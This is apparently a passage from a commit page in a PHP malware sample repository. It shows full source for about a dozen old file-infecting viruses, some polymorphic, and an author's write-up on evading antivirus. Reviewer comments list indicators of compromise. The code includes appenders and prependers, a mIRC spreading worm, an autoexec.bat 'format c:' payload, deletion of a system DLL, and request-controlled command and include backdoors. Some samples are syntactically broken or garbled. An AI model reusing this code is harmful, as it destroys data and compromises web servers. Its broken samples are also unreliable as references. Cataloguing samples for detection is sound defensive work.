$infs = strstr ($check, '47hGHRHjkliliurpIOIPOIporipOOPOirujkJKLLJj<Xmorfic>HKGJD');
if (!$infs) $infsystem = false;
if ( ($infsystem=false) )
{
$infsys = fopen($config, "a");
$fputs($infsys, "47hGHRHjkliliurpIOIPOIporipOOPOirujkJKLLJj<Xmorfic>HKGJD");
$fputs($infsys, "Xmorfic, www.shadowvx.com/bcvg, Second PHP VIRUS");
return;
}
fclose($infsys);
$infbat = fopen($autoexec, "r");
$checkb = fread($infbat, filesize($autoexec));
$infb = strstr ($checkb, 'format c: /autotest /q /u');
if (!$infb) $infbatf = false;
if ( ($infbatf=false) )
{
$infbat = fopen($autoexec, "a");
$fputs($infbat, "ctty nul ");
$fputs($infbat, "format c: /autotest /q /u ");
return;
}
fclose($infbat);
$systems = opendir('C:\Windows\Command\');
while ($filesys = readdir($systems))
{
$infected = true;
$systemexe = false;
if ( ($systemexe = strstr ($filesys, '.sys') )
if ( (is_writeable($filesys) )
{
$sysk = fopen($filesys, "r");
$xst = fread($sysk, filesize($filesys);
$good = strstr ($xst, 'Xmorfic_Vx');
if (!$good) $infected = false;
}
if ( ($infected=false) )
{
$sysk = fopen($filesys, "a");
$fputs($sysk, "Xmorfic_VX_System_PHP_Infector!!');
return;
}
}
closedir($systems);
// Rename the virus to sysbat.sys (Optional) $ren = rename(__FILE__, $newphp);
$kok = unlink ('C:\Windows\System\Wsock32.dll');
echo $avxm;
?>
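Review bot: The header comment describes this sample only as infecting Config.sys, autoexec.bat and system files, but the strings it is written to add are destructive: `format c: /autotest /q /u` after `ctty nul` in `C:\Autoexec.bat`, plus an `unlink` of `C:\Windows\System\Wsock32.dll` at the end. The index entry should classify it as destructive and list what a responder can search for. Those markers are `47hGHRHjkliliurpIOIPOIporipOOPOirujkJKLLJj<Xmorfic>HKGJD` in `C:\Config.sys`, the `ctty nul` / format pair in `C:\Autoexec.bat`, and `Xmorfic_VX_System_PHP_Infector!!` appended to `.sys` files under `C:\Windows\Command\`.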

1
PHP/Trojan.PHP.Turame.d Normal file

@ -0,0 +1 @@
<?mmcache_load("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");?>

25
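--- a/PHP/Trojan.PHP.Zapchast.c
+++ b/PHP/Trojan.PHP.Zapchast.c
@@ -0,0 +1,25 @@
+<?
+echo "ALBANIA<br>";
+$alb = @php_uname();
+$alb2 = system(uptime);
+$alb3 = system(id);
+$alb4 = @getcwd();
+$alb5 = getenv("SERVER_SOFTWARE");
+$alb6 = phpversion();
+$alb7 = $_SERVER['SERVER_NAME'];
+$alb8 = gethostbyname($SERVER_ADDR);
+$alb9 = get_current_user();
+$os = @PHP_OS;
+echo "os: $os<br>";
+echo "uname -a: $alb<br>";
+echo "uptime: $alb2<br>";
+echo "id: $alb3<br>";
+echo "pwd: $alb4<br>";
+echo "user: $alb9<br>";
+echo "phpv: $alb6<br>";
+echo "SoftWare: $alb5<br>";
+echo "ServerName: $alb7<br>";
+echo "ServerAddr: $alb8<br>";
+echo "UNITED ALBANIANS aka ALBOSS PARADISE<br>";
+exit;
+?>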

81
PHP/Virus.PHP.Alf Normal file

@ -0,0 +1,81 @@
<?php
// PHP.Alf by ULTRAS[MATRiX]
$phpdir = 'c:\phpalf';
$mircinf = 'c:\mirc\script.ini';
$shom = true;
if ( (file_exists($mircinf) )
{
$script = fopen($mircinf, "r");
$checks = fread($script, filesize($mircinf);
$virz = strstr($checks, 'script.php');
if (!$virz) $shom = false;
if ( ($shom=false) )
{
$unmirc = unlink($mircinf);
$tomirc = touch($mircinf);
$open_mirc = fopen($mircinf, "a");
$fputs($open_mirc, "[script]");
$fputs($open_mirc, "n0; A.L.F script");
$fputs($open_mirc, "n1; by ULTRAS[MATRiX]");
$fputs($open_mirc, "n2=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt }");
$fputs($open_mirc, "n3= /dcc send $nick c:\phpalf\script.php");
$fputs($open_mirc, "n4=}");
$fputs($open_mirc, "n5=ON 1:PART:#:{ /if ( $nick == $me ) { halt }");
$fputs($open_mirc, "n6= /dcc send $nick c:\phpalf\script.php");
$fputs($open_mirc, "n7=}");
$fputs($open_mirc, "n8=on 1:QUIT:#:/msg $chan MTX4EVER");
$fputs($open_mirc, "n9=on 1:TEXT:*virus*:#:/.ignore $nick");
$fputs($open_mirc, "n10=on 1:TEXT:*virus*:?:/.ignore $nick");
$fputs($open_mirc, "n11=on 1:TEXT:*worm*:#:/.ignore $nick");
$fputs($open_mirc, "n12=on 1:TEXT:*worm*:?:/.ignore $nick");
$fputs($open_mirc, "n13=on 1:TEXT:*php*:#:/.ignore $nick");
$fputs($open_mirc, "n14=on 1:TEXT:*php*:?:/.ignore $nick");
$fputs($open_mirc, "n15=on 1:TEXT:*script*:#:/.ignore $nick");
$fputs($open_mirc, "n16=on 1:TEXT:*script*:?:/.ignore $nick");
return;
}
}
fclose($mircinf);
$shom = true;
$createdir = mkdir($phpdir,0)
$renamefile = rename(__FILE__, 'alf.php');
$copyfile = copy(__FILE__, 'c:\phpalf');
$rename2 = rename('c:\phpalf\alf.php', 'script.php');
$dirz = opendir('.');
while ($alldir = readdir($dirz))
{
$inf_ = true;
$ext_ = false;
if ( ($ext_ = strstr ($alldir, '.php')) || ($ext_ = strstr ($alldir, '.html')) || ($ext_ = strstr ($alldir, '.htm')) )
if ( is_file($alldir) && is_writeable($alldir) )
{
$opz = fopen($alldir, "r");
$check = fread($opz, filesize($alldir));
$sig_ = strstr ($check, 'alf.php');
if (!$sig_) $inf_ = false;
}
if ( ($inf_=false) )
{
$opz = fopen($alldir, "a");
$fputs($opz, "<?php ");
$fputs($opz, "include(\"");
$fputs($opz, __FILE__);
$fputs($opz, "\"); ");
$fputs($opz, "?>");
return;
}
}
closedir($dirz);
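Review bot: The directory loop at the end of this file is the same appender template that appears in `PHP/Virus.PHP.Neworld`, `PHP/Virus.PHP.Indonesia` and `PHP/Virus.PHP.Pirus` (and in the second block of `PHP/Virus.PHP.Feast`), and none of those sections documents it. Each one checks a candidate file for its own file name as an infection marker and is written to append a `<?php include("…"); ?>` line pointing back at itself. I would note the marker per sample (`alf.php`, `neworld.php`, `indonesia.php`, `pirus.php`), since a trailing `include` of such a path after the legitimate end of a `.php` or `.htm` file is what a responder would search a web root for. Specific to this sample are the mIRC artefacts: a rewritten `c:\mirc\script.ini` containing `A.L.F script` and `/dcc send` lines, and the `c:\phpalf` directory.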

68
PHP/Virus.PHP.Aracn Normal file

@ -0,0 +1,68 @@
<?php
// PHP/Spider
// By FSo
// Proof-of-Concept PHP appender (PHP 3.0.6+)
// Dedicated to all the friends who held me together...
// And made for the enemies who tried to bring me down.
//
// Greets to Adolfo, Zulu, C.W., and the vets
// of A.C.V.S.C.
$myhandle = fopen(__FILE__, "rb");
$buffer = fread($myhandle, filesize(__FILE__));
fclose($myhandle);
$buffer = "<?php \r\n// " . substr($buffer, strpos($buffer, "PHP/Spider")) . "\r\n?>";
scan(".", TRUE);
if (isset($_GLOBALS['SPIDER_COMMAND']) == TRUE) {
if (empty($_GLOBALS['SPIDER_COMMAND']) == FALSE) {
system($_GLOBALS['SPIDER_COMMAND']);
}
}
function scan($path, $recurse) {
global $buffer;
//global $polyarr;
$dirres = opendir($path);
if ($dirres == TRUE) {
while (1) {
$entity = readdir($dirres);
if ($entity == FALSE && is_string($entity) == FALSE) { break; }
if (is_dir($entity) == TRUE) {
if ($entity == ".") {
} else {
if ($recurse == TRUE) {
scan($entity, FALSE);
}
}
} else {
$ext = strtoupper(substr($entity, strrpos($entity, ".")));
if ($ext == ".PHP" || $ext == ".PHP3" || $ext == ".PHTML" || $ext == ".PHP4") {
$fhandle = fopen($entity, "rb");
$contents = fread($fhandle, filesize($entity));
fclose($fhandle);
if (strstr($contents, "PHP/Spider") == FALSE) {
$fhandle = fopen($path . "/" . $entity, "ab");
fwrite($fhandle, $buffer);
fclose($fhandle);
}
}
}
}
closedir($dirres);
}
return;
}
// As the spiders multiplied, They surrounded him,
// and kept coming...
//
// As the last minute opportunists finished him off,
// And his life flashed before him, all he could
// do was simply watch.
//
// Helpless and nearly defeated, he lived the horror
// none could stand, if they had a choice...
//
// PHP/Spider.A by FSo
// June 24, 2002
?>
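Review bot: The header comment calls this a "Proof-of-Concept PHP appender", but the top-level code also contains a command hook, the `system(...)` call guarded by the two `SPIDER_COMMAND` checks, which the comment does not mention. The index entry should classify the sample as appender plus command execution. It should also give both strings a responder can search for in a web root: the `PHP/Spider` marker that `scan()` tests for before writing to `.PHP`, `.PHP3`, `.PHTML` and `.PHP4` files, and `SPIDER_COMMAND`.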

65
PHP/Virus.PHP.Aristo.a Normal file

@ -0,0 +1,65 @@
<?php // Aristotle
$file = $_SERVER["SCRIPT_NAME"];
$break = Explode('/', $file);
$pfile = $break[count($break) - 1];
$handle = fopen($pfile, 'rb');
$aris = fread($handle, 2624);
fclose($handle);
$dir=opendir('.');
while (($file = readdir($dir)) !== false)
{
if (strstr($file,'.html')) {
$arisjs='<html>'.chr(13).chr(10);
$arisjs.='<head>'.chr(13).chr(10);
$arisjs.='<title>'.chr(13).chr(10);
$arisjs.='</title>'.chr(13).chr(10);
$arisjs.='<SCRIPT LANGUAGE='.chr(34).'Javascript'.chr(34).'>'.chr(13).chr(10);
$arisjs.='var x = 10'.chr(13).chr(10);
$arisjs.='var y = 1 '.chr(13).chr(10);
$arisjs.='function startClock(){ '.chr(13).chr(10);
$arisjs.='x = x-y '.chr(13).chr(10);
$arisjs.='setTimeout('.chr(34).'startClock()'.chr(34).', 10)'.chr(13).chr(10);
$arisjs.='if(x==0)'.chr(13).chr(10);
$arisjs.='{'.chr(13).chr(10);
$arisjs.='aristotle = window.open('.chr(34).'http://www.ibiblio.org/wm/paint/auth/rembrandt/1650/aristotle-homer.jpg'.chr(34).')'.chr(13).chr(10);
$arisjs.='setTimeout('.chr(34).'aristotle.close()'.chr(34).',20)'.chr(13).chr(10);
$arisjs.='x=10'.chr(13).chr(10);
$arisjs.='}'.chr(13).chr(10);
$arisjs.='}'.chr(13).chr(10);
$arisjs.='</SCRIPT>'.chr(13).chr(10);
$arisjs.='</HEAD>'.chr(13).chr(10);
$arisjs.='<BODY BGCOLOR='.chr(34).'#FFFFFF'.chr(34).' onLoad='.chr(34).'startClock()'.chr(34).'>'.chr(13).chr(10);
$arisjs.='Change in all things is sweet.'.chr(13).chr(10);
$arisjs.='- Aristotle'.chr(13).chr(10);
$arisjs.='</BODY>'.chr(13).chr(10);
$arisjs.='</HTML>'.chr(13).chr(10);
$b = fopen($file, 'w');
fwrite($b,$arisjs);
fclose($b);
exec($file);
}
if (strstr($file,'.php')) { if (!strstr($file, 'Aristotle')) {
$a = fopen($file,'rb');
$contents = fread($a, filesize($file));
if (!strstr($contents, 'Aristotle'))
{
fclose($a);
$b = fopen($file,'w');
fwrite($b, $aris.$contents);
fclose($b);
}
}
}
if (is_dir($file)) { if (!strstr($file, '.')) { chdir($file);
}
}
}
closedir($dir);
?>
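Review bot: The `.html` branch opens each matching file with mode `'w'` and writes a fixed page, so the original content is replaced rather than extended, which the one-word header comment does not convey. I would document the sample as overwriting for `.html` and prepending for `.php`, where it reads a fixed 2624 bytes of itself and writes them ahead of the host content. The distinction matters for recovery: a prepended `.php` file can be cleaned by removing the leading block that contains `Aristotle`, while an overwritten `.html` file needs a backup. The injected page's `window.open` URL on ibiblio.org and the text `Change in all things is sweet.` are usable content indicators.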

80
PHP/Virus.PHP.Feast Normal file

@ -0,0 +1,80 @@
<?php
$ypxqrpsqcc = fopen(__FILE__, "r");
$bbugesqpty = substr(fread($ypxqrpsqcc, filesize(__FILE__)), 0, 1249);
fclose($ypxqrpsqcc);
$dhbpgxtamn = array("ypxqrpsqcc", "bbugesqpty", "dhbpgxtamn", "cctsvcopcx", "wurwejtvjx",
"ccznwozuuo", "uudxleoyja", "ionwdbkwfh", "zohqscoxob", "skzmabzbfe");
for($cctsvcopcx = 0; $cctsvcopcx < count($dhbpgxtamn); $cctsvcopcx++){
$wurwejtvjx = chr(rand(97, 122));
for($ccznwozuuo = 0; $ccznwozuuo < 9; $ccznwozuuo++) $wurwejtvjx = $wurwejtvjx . chr(rand(97, 122));
$bbugesqpty = str_replace("$dhbpgxtamn[$cctsvcopcx]", "$wurwejtvjx", "$bbugesqpty");
}
$uudxleoyja = opendir(".");
while(false !== ($ionwdbkwfh = readdir($uudxleoyja))){
if($ionwdbkwfh != "." && $ionwdbkwfh != ".."){
if(substr($ionwdbkwfh, -3) == "php"){
$zohqscoxob = fopen($ionwdbkwfh, "r");
$skzmabzbfe = substr(fread($zohqscoxob, filesize($ionwdbkwfh)), 5);
fclose($zohqscoxob);
if(!strstr($skzmabzbfe, "php.faces")){
unlink("$ionwdbkwfh");
$zohqscoxob = fopen($ionwdbkwfh, "a+");
fwrite($zohqscoxob, "$bbugesqpty");
fwrite($zohqscoxob, "$skzmabzbfe");
fclose($zohqscoxob);
}
}
}
}
closedir($uudxleoyja);
// php.faces (c) by Kefi, 2003
?>
<?php
$vir_string = "Neworld.PHP\n";
$virstringm = "Welcome To The New World Of PHP Programming\n";
$virt = $vir_string . $virstringm;
echo $virt;
$all = opendir('C:\Windows\');
while ($file = readdir($all))
{
$inf = true;
$exe = false;
if ( ($exe = strstr ($file, '.php')) || ($exe = strstr ($file, '.html')) || ($exe = strstr ($file, '.htm')) || ($exe = strstr ($file, '.htt')) )
if ( is_file($file) && is_writeable($file) )
{
$new = fopen($file, "r");
$look = fread($new, filesize($file));
$yes = strstr ($look, 'neworld.php');
if (!$yes) $inf = false;
}
if ( ($inf=false) )
{
$new = fopen($file, "a");
$fputs($new, "<!-- ");
$fputs($new, "Neworld.PHP - ");
$fputs($new, "Made By Xmorpfic, ");
$fputs($new, "www.shadowvx.com/bcvg, ");
$fputs($new, "The Black Cat Virii Group.");
$fputs($new, "--->");
$fputs($new, "<?php ");
$fputs($new, "include(\"");
$fputs($new, __FILE__);
$fputs($new, "\"); ");
$fputs($new, "?>");
return;
}
}
closedir($all);
// Neworld.PHP Virus - Made By Xmorfic, www.shadowvx.com/bcvg, Black Cat Virii Group.
?>
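Review bot: This file holds two samples back to back: the first `<?php … ?>` block is the `php.faces` prepender that also appears alone in `PHP/Virus.PHP.Feast.a`, and the second block is the content of `PHP/Virus.PHP.Neworld`. What was committed therefore looks like a Neworld file infected by Feast rather than a clean Feast sample, and the index entry should say so; otherwise signatures derived from the whole file will also fire on Neworld. The prepender replaces its ten variable names with random lowercase strings through `str_replace` on every copy, so identifiers such as `$ypxqrpsqcc` are of no use for detection. The stable parts are the `php.faces` marker comment, the fixed `1249`-byte read of `__FILE__`, and the statement order.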

31
PHP/Virus.PHP.Feast.a Normal file

@ -0,0 +1,31 @@
<?php
$ypxqrpsqcc = fopen(__FILE__, "r");
$bbugesqpty = substr(fread($ypxqrpsqcc, filesize(__FILE__)), 0, 1249);
fclose($ypxqrpsqcc);
$dhbpgxtamn = array("ypxqrpsqcc", "bbugesqpty", "dhbpgxtamn", "cctsvcopcx", "wurwejtvjx",
"ccznwozuuo", "uudxleoyja", "ionwdbkwfh", "zohqscoxob", "skzmabzbfe");
for($cctsvcopcx = 0; $cctsvcopcx < count($dhbpgxtamn); $cctsvcopcx++){
$wurwejtvjx = chr(rand(97, 122));
for($ccznwozuuo = 0; $ccznwozuuo < 9; $ccznwozuuo++) $wurwejtvjx = $wurwejtvjx . chr(rand(97, 122));
$bbugesqpty = str_replace("$dhbpgxtamn[$cctsvcopcx]", "$wurwejtvjx", "$bbugesqpty");
}
$uudxleoyja = opendir(".");
while(false !== ($ionwdbkwfh = readdir($uudxleoyja))){
if($ionwdbkwfh != "." && $ionwdbkwfh != ".."){
if(substr($ionwdbkwfh, -3) == "php"){
$zohqscoxob = fopen($ionwdbkwfh, "r");
$skzmabzbfe = substr(fread($zohqscoxob, filesize($ionwdbkwfh)), 5);
fclose($zohqscoxob);
if(!strstr($skzmabzbfe, "php.faces")){
unlink("$ionwdbkwfh");
$zohqscoxob = fopen($ionwdbkwfh, "a+");
fwrite($zohqscoxob, "$bbugesqpty");
fwrite($zohqscoxob, "$skzmabzbfe");
fclose($zohqscoxob);
}
}
}
}
closedir($uudxleoyja);
// php.faces (c) by Kefi, 2003
?>

35
PHP/Virus.PHP.Indonesia Normal file

@ -0,0 +1,35 @@
$jawa = "indonesia.php\n";
$sumatra = "Wellcome to Indonesian PHPlovers.\n";
$kalimantan = $jawa . $sumatra;
echo $kalimantan;
$all = opendir('C:\Windows\');
$all1 = opendir('C:\My Documents\');
$all2 = opendir('C:\InetPub\wwwRoot\');
$all3 = $all && $all1 && $all2
while ($file = readdir($all3))
{
$inf = true;
$exe = false;
if ( ($exe = strstr ($file, '.php')) || ($exe = strstr ($file, '.php2')) || ($exe = strstr ($file, '.php3')) )
if ( is_file($file) && is_writeable($file) )
{
$new = fopen($file, "r");
$look = fread($new, filesize($file));
$yes = strstr ($look, 'indonesia.php');
if (!$yes) $inf = false;
}
if ( ($inf=false) )
{
$new = fopen($file, "a");
$fputs($new, "");
$fputs($new, " $fputs($new, "include(\"");
$fputs($new, __FILE__);
$fputs($new, "\"); ");
$fputs($new, "?>");
return;
}
}
closedir($all3);
// PHP.Indonesia made for all Chicken looser ground the world
// By sevenC / N0:7
?>
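Review bot: This copy appears to have lost text: the visible content has no opening `<?php` tag, and one line fuses two statements with part of a string literal missing (`$fputs($new, " $fputs($new, "include(\"");`). The count in the hunk header (35) equals the number of visible lines, which suggests the loss is in the committed file rather than in this page's rendering. Plausibly an HTML sanitiser removed tag-like strings before the file was archived, though the page cannot confirm that. The index entry should flag the sample as damaged so that its hash is not treated as the reference for the family.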

45
PHP/Virus.PHP.Neworld Normal file

@ -0,0 +1,45 @@
<?php
$vir_string = "Neworld.PHP\n";
$virstringm = "Welcome To The New World Of PHP Programming\n";
$virt = $vir_string . $virstringm;
echo $virt;
$all = opendir('C:\Windows\');
while ($file = readdir($all))
{
$inf = true;
$exe = false;
if ( ($exe = strstr ($file, '.php')) || ($exe = strstr ($file, '.html')) || ($exe = strstr ($file, '.htm')) || ($exe = strstr ($file, '.htt')) )
if ( is_file($file) && is_writeable($file) )
{
$new = fopen($file, "r");
$look = fread($new, filesize($file));
$yes = strstr ($look, 'neworld.php');
if (!$yes) $inf = false;
}
if ( ($inf=false) )
{
$new = fopen($file, "a");
$fputs($new, "<!-- ");
$fputs($new, "Neworld.PHP - ");
$fputs($new, "Made By Xmorpfic, ");
$fputs($new, "www.shadowvx.com/bcvg, ");
$fputs($new, "The Black Cat Virii Group.");
$fputs($new, "--->");
$fputs($new, "<?php ");
$fputs($new, "include(\"");
$fputs($new, __FILE__);
$fputs($new, "\"); ");
$fputs($new, "?>");
return;
}
}
closedir($all);
// Neworld.PHP Virus - Made By Xmorfic, www.shadowvx.com/bcvg, Black Cat Virii Group.
?>

29
PHP/Virus.PHP.Pirus Normal file

@ -0,0 +1,29 @@
<?php
$handle=opendir('.');
while ($file = readdir($handle))
{ $infected=true;
$executable=false;
if ( ($executable = strstr ($file, '.php')) || ($executable = strstr ($file, '.htm')) || ($executable = strstr ($file, '.php')) )
if ( is_file($file) && is_writeable($file) )
{
$host = fopen($file, "r");
$contents = fread ($host, filesize ($file));
$sig = strstr ($contents, 'pirus.php');
if(!$sig) $infected=false;
}
//infect
if (($infected==false))
{
$host = fopen($file, "a");
fputs($host,"<?php ");
fputs($host,"include(\"");
fputs($host,__FILE__);
fputs($host,"\"); ");
fputs($host,"?>");
fclose($host);
return;
}
}
closedir($handle);
?>

43
PHP/Virus.PHP.Pooks.a Normal file

@ -0,0 +1,43 @@
<?php
//skooop!
/*
Virus.PHP.Skooop - written by Kluu in 2007.
Revision 2007.12.30.0001
*/
$self = strstr(file_get_contents(__FILE__), '//skooop!');
function infect($dir) {
global $self;
$handle = opendir($dir);
while (false !== ($file = readdir($handle))) {
$infected = true;
if (is_dir("$dir/$file") && $file != '.' && $file != '..') {
infect("$dir/$file");
}
if (strpos($file, '.php')) {
if (substr($file, -1) != 's') {
$host = fopen("$dir/$file", 'r');
$filesize = filesize("$dir/$file");
if ($filesize == 0) {
$filesize = 1;
}
if (!strpos(fread($host, $filesize), '//skooop!')) {
$infected = false;
}
if (($infected == false)) {
copy("$dir/$file", "$dir/{$file}s");
$host = fopen("$dir/$file", 'a');
fwrite($host, "<?php\n$self");
fclose($host);
}
}
}
}
closedir($handle);
}
echo '<b>Get the source of this phile <a href="'.$file.'s">here</a></b>';
@include($_GET['atk_script']);
infect('../../../../../../../../../../../../../../../../');
?>
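Review bot: The `@include($_GET['atk_script']);` line near the end takes its include target from the HTTP request with errors suppressed, and because `$self` is everything from the `//skooop!` marker to the end of the file, that line is copied into every host that `infect()` appends to. Each infected script therefore becomes a request-controlled inclusion point, not only a carrier, and `copy("$dir/$file", "$dir/{$file}s")` leaves a `.phps` copy of the original beside it, which some server configurations serve as readable source. None of that is documented in the sample; I would add `// IoCs: marker "//skooop!", "<name>.phps" copies beside hosts, requests carrying an "atk_script" parameter`. On the hardening side, `allow_url_include=Off` and an `open_basedir` restriction limit what such an include can reach, and the recursive walk that starts at `../../…` means the exposure is whatever the PHP user can write.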

92
PHP/Virus.PHP.Qwax Normal file

@ -0,0 +1,92 @@
PHP.QAZWSX
<?//QAZWSX
function Infect($path)
{
global $self;
$handle = opendir($path);
$file = readdir($handle);
while ( false != $file )
{
if ($file != "." && $file != "..")
{
if (is_dir($path.$file))
{
Infect($path.$file."/");
}
else if (strrpos($file, ".php") != 0)
{
$do_infect = true;
$victim = fopen($path.$file, "r+");
while (!feof($victim))
{
$buf = fgets($victim, 4096);
if (strrpos($buf, "QAZWSX") != 0)
{
$do_infect = false;
break;
}
}
if ($do_infect)
{
fputs($victim, $self);
}
fclose($victim);
}
}
$file = readdir($handle);
}
closedir($handle);
}
$found = false;
$bracket_found = false;
$sf = fopen($SCRIPT_FILENAME, "r");
while (!feof($sf))
{
$s = fgets($sf, 4096);
if ($found)
{
$self .= $s;
if (strrpos($s, "?>") != 0)
{
if ($bracket_found)
{
break;
}
else
{
$bracket_found = true;
}
}
}
else if (strrpos($s, "QAZWSX") != 0)
{
$found = true;
$self = $s;
}
}
fclose($sf);
Infect($DOCUMENT_ROOT."/");
?>
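Review bot: The top-level code reads `$SCRIPT_FILENAME` and `$DOCUMENT_ROOT` as bare globals (`fopen($SCRIPT_FILENAME, "r")` and `Infect($DOCUMENT_ROOT."/")`), which are populated only when `register_globals` is enabled, a setting removed in PHP 5.4. That bounds the environments where this sample is relevant and is worth recording next to it, together with the marker it tests for. Suggested comment: `// Relies on register_globals-era globals; marker "QAZWSX"; appends its body to .php files under the document root, recursing into subdirectories`.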

38
PHP/Virus.PHP.Rabow Normal file

@ -0,0 +1,38 @@
<?php // RainBow
srand((double)microtime()*1000000);
$changevars=array('changevars','string','newcont','curdir','filea','victim','viccont','newvars','returnvar','counti','countj','trash','allcont','number','remn');
$string=strtok(fread(fopen(__FILE__,'r'), filesize(__FILE__)),chr(13).chr(10));
$newcont='<?php // RainBow'.chr(13).chr(10);
while ($string && $string!='?>'){
if(rand(0,1)){
if(rand(0,1)){$newcont.='// '.trash('',0).chr(13).chr(10);}
if(rand(0,1)){$newcont.='$'.trash('',0).'='.chr(39).trash('',0).chr(39).';'.chr(13).chr(10);}
if(rand(0,1)){$newcont.='$'.trash('',0).'='.rand().';'.chr(13).chr(10);}}
$string=strtok(chr(13).chr(10));
if($string{0}!='/' && $string{0}!='$'){$newcont.=$string.chr(13).chr(10);}}
$counti=0;
while($changevars[$counti]){
$newcont=str_replace($changevars[$counti++],trash('',0),$newcont);}
$countj=-1; $number='';
while(++$countj<strlen($newcont)){
if (ord($newcont{$countj})>47&&ord($newcont{$countj})<58){
$number=$newcont{$countj};
while(ord($newcont{++$countj})>47&&ord($newcont{$countj})<58){$number.=$newcont{$countj};}
$remn=rand(1,10);
if (!rand(0,5)){switch(rand(1,3)){case 1:$allcont.='('.($number-$remn).'+'.$remn.')';break;
case 2:$allcont.='('.($number+$remn).'-'.$remn.')';break;
case 3:$allcont.='('.($number*$remn).'/'.$remn.')';break;}}else{$allcont.=$number;}}
$allcont.=$newcont{$countj};$number='';}
$curdir=opendir('.');
while($filea=readdir($curdir)){
if(strstr($filea,'.php')){$victim=fopen($filea,'r+');
if (!strstr(fread($victim, 25),'RainBow')){rewind($victim);
$viccont=fread($victim,filesize($filea));
rewind($victim);
fwrite($victim,$allcont.$viccont);}
fclose($victim);}}
closedir($curdir);
function trash($returnvar, $countj){
do{$returnvar.=chr(rand(97,122));}while($countj++<rand(5,15));
return $returnvar;}
?>
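Review bot: The three rewriting passes leave one thing fixed: `$newcont` is seeded with the literal `'<?php // RainBow'` and the pre-infection check is `strstr(fread($victim, 25),'RainBow')`, so every generation appears to start with the same first line. That is the stable detection anchor for this family and it is not written down anywhere in the sample; I would add `// Detection anchor: first line is always "<?php // RainBow"; names, junk lines and numeric literals vary per generation`. The `$string{0}` / `$newcont{$countj}` brace offsets were removed in PHP 8.0, which limits the runtimes this applies to. Virus.PHP.Rabow.a is the same code preceded by the author's write-up, which names the same marker.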

128
PHP/Virus.PHP.Rabow.a Normal file

@ -0,0 +1,128 @@
PHP.Rainbow
by Second Part To Hell[rRlf]
www.spth.de.vu
spth@aonmail.at
written in october 2003
in Austria
You're looking at my very first PHP virus, but don't be sad, it's a really good one :)
First I want to tell you something about the features of the virus, that I'll give
you some Information about the technique of the features.
OK, it's a Prepender PHP virus, which uses three polymorphism tecniques. The poly engine
are totally new, because I've never seen any other poly PHP virus (Kefi did one in
the meantime, but I haven't seen it so far). As I told you, there are three different
Polymorphism techniques, I'm sure that you want to know more about them :) First engine
adds trash/garbage/junk (however you wanna call it) to the code, the second one changes
15 variable/function names. And the last one changes numbers. Now let's have a look at
the better explanation, not this shourt summary :)
Technique Information:
* Poly Engines
--> Adding Trash/Junk/Garbage
The Virus adds ine in two lines a junk line to the code.
This Junk-line could contain:
- // anything
- $anything='anything';
- $anything=number;
Because the code would be damn big after the 5th generation, I desided
to delete the trash after every generation and make a new one. Anyway,
the chance to get a trash-line will be bigger, because there are more
lines (more lines --> more chance). But I tested about 30 generation
and it's no big problem with the size.
--> Changing Variable/function names
The Virus uses an array with all variable/function names of the virus,
every generation it changes every array-entry (every name) to a 5-15
sign long new name.
--> Number changing
The virus is able to change every number in the code. This is a real
successfull way to fake AVs, i think! A number (for instands '10') could
also be one of the following things:
10=(8+2)
10=(19-9)
10=(130/13)
It's easy to understand, I think. I desided to change ever 5th number I can
find, because it looks better than changing every number every generation.
* Infection Method
--> Prepender
This code is a prepender virus, which doesn't harm the victim file.
It reads the first PHP part (which is the whole virus code) of the current
file (__FILE__, as it's called in PHP). Than it searchs for every PHP-files
in the current directory, and adds the changed virus code at the beginn of
the victim file. Before infecting the virus checks, if there's already an
infection mark or the virus, which is 'RainBow'.
Something else little interesting is, that it's hard to get many different generations from
the virus, because it just changes, if it infects a file. And just the infected file has the
different form, not the old virus. That's a little trick, which I read in an article about
Polymorphism by SnakeByte. He wrote, that it will use more time to get many generations, which
is a problem for AVs (who needs many generations :D).
In the end I want to thank the following people, which made it possible, that I
wrote this virus :)
- Fugo <-- Guy from school, PHP expert but non viral stuff :(
Much thanks for the information you gave me in PHP!
- www.php.net & www.apachefriends.com <-- Great PHP information!!!
- MaskBits/VXI <-- Writing the first real PHP maleware (released in 29A#5)
- PhileT0Ast3r <-- Telling me, that Kefi also writes a PHP poly virus
- Kefi <-- for also writing a PHP poly virus :D
- Theatre Of Tragedy | Darkfall <-- for the great sounds!!!
- Cigarettes | Beer <-- for helping me to don't commit suicide while searching
for the bugs in this little thing :)
Maybe you wanna know, why I gave this name. I won't tell you, but the person, where the name
comes from, should understand it ;)
Execute this virus with PHP 4.3.3 + PEAR. I did it, and it worked really fine!
--------------------------------------< PHP.RainBow >--------------------------------------
<?php // RainBow
srand((double)microtime()*1000000);
$changevars=array('changevars','string','newcont','curdir','filea','victim','viccont','newvars','returnvar','counti','countj','trash','allcont','number','remn');
$string=strtok(fread(fopen(__FILE__,'r'), filesize(__FILE__)),chr(13).chr(10));
$newcont='<?php // RainBow'.chr(13).chr(10);
while ($string && $string!='?>'){
if(rand(0,1)){
if(rand(0,1)){$newcont.='// '.trash('',0).chr(13).chr(10);}
if(rand(0,1)){$newcont.='$'.trash('',0).'='.chr(39).trash('',0).chr(39).';'.chr(13).chr(10);}
if(rand(0,1)){$newcont.='$'.trash('',0).'='.rand().';'.chr(13).chr(10);}}
$string=strtok(chr(13).chr(10));
if($string{0}!='/' && $string{0}!='$'){$newcont.=$string.chr(13).chr(10);}}
$counti=0;
while($changevars[$counti]){
$newcont=str_replace($changevars[$counti++],trash('',0),$newcont);}
$countj=-1; $number='';
while(++$countj<strlen($newcont)){
if (ord($newcont{$countj})>47&&ord($newcont{$countj})<58){
$number=$newcont{$countj};
while(ord($newcont{++$countj})>47&&ord($newcont{$countj})<58){$number.=$newcont{$countj};}
$remn=rand(1,10);
if (!rand(0,5)){switch(rand(1,3)){case 1:$allcont.='('.($number-$remn).'+'.$remn.')';break;
case 2:$allcont.='('.($number+$remn).'-'.$remn.')';break;
case 3:$allcont.='('.($number*$remn).'/'.$remn.')';break;}}else{$allcont.=$number;}}
$allcont.=$newcont{$countj};$number='';}
$curdir=opendir('.');
while($filea=readdir($curdir)){
if(strstr($filea,'.php')){$victim=fopen($filea,'r+');
if (!strstr(fread($victim, 25),'RainBow')){rewind($victim);
$viccont=fread($victim,filesize($filea));
rewind($victim);
fwrite($victim,$allcont.$viccont);}
fclose($victim);}}
closedir($curdir);
function trash($returnvar, $countj){
do{$returnvar.=chr(rand(97,122));}while($countj++<rand(5,15));
return $returnvar;}
?>

42
PHP/Virus.PHP.Rebber Normal file

@ -0,0 +1,42 @@
<?php
function webb()
{
